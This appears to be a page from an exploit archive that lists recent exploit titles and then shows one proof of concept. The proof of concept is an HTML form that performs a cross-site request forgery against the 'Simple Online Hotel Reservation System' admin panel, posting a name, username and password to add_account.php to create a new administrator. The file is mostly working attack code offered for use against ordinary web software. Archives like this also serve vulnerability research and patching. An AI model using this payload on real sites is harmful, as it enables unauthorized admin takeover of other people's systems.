31edb35a91
9 changes to exploits/shellcodes FTP Server 1.32 - Denial of Service WebKitGTK 2.23.90 / WebKitGTK+ 2.22.6 - Denial of Service TransMac 12.3 - Denial of Service (PoC) Simple Online Hotel Reservation System - SQL Injection Simple Online Hotel Reservation System - Cross-Site Request Forgery (Add Admin) Simple Online Hotel Reservation System - Cross-Site Request Forgery (Delete Admin) Joomla! Component J2Store < 3.3.7 - SQL Injection Usermin 1.750 - Remote Command Execution (Metasploit) Feng Office 3.7.0.5 - Remote Command Execution (Metasploit)
27 lines
No EOL
882 B
HTML
27 lines
No EOL
882 B
HTML
# Exploit Title: Simple Online Hotel Reservation System - Cross-Site Request Forgery (Add Admin)
|
|
# Exploit Author: Mr Winst0n
|
|
# Author E-mail: manamtabeshekan[@]gmail[.]com
|
|
# Discovery Date: February 25, 2019
|
|
# Vendor Homepage: https://code-projects.org/
|
|
# Software Link : https://code-projects.org/simple-online-hotel-reservation-system-in-php-with-source-code/
|
|
# Tested on: Kali linux, Windows 8.1
|
|
|
|
# PoC:
|
|
|
|
<html>
|
|
<head>
|
|
<title>Add Admin</title>
|
|
</head>
|
|
<body>
|
|
<form method = "POST" action="http://localhost/[PATH]/admin/add_account.php">
|
|
<label>Name </label>
|
|
<input type = "text" name = "name" /><br><br>
|
|
<label>Username </label>
|
|
<input type = "text" name = "username" /><br><br>
|
|
<label>Password </label>
|
|
<input type = "password" name = "password" /><br><br>
|
|
<button name = "add_account">Saved</button>
|
|
</div>
|
|
</form>
|
|
</body>
|
|
</html> |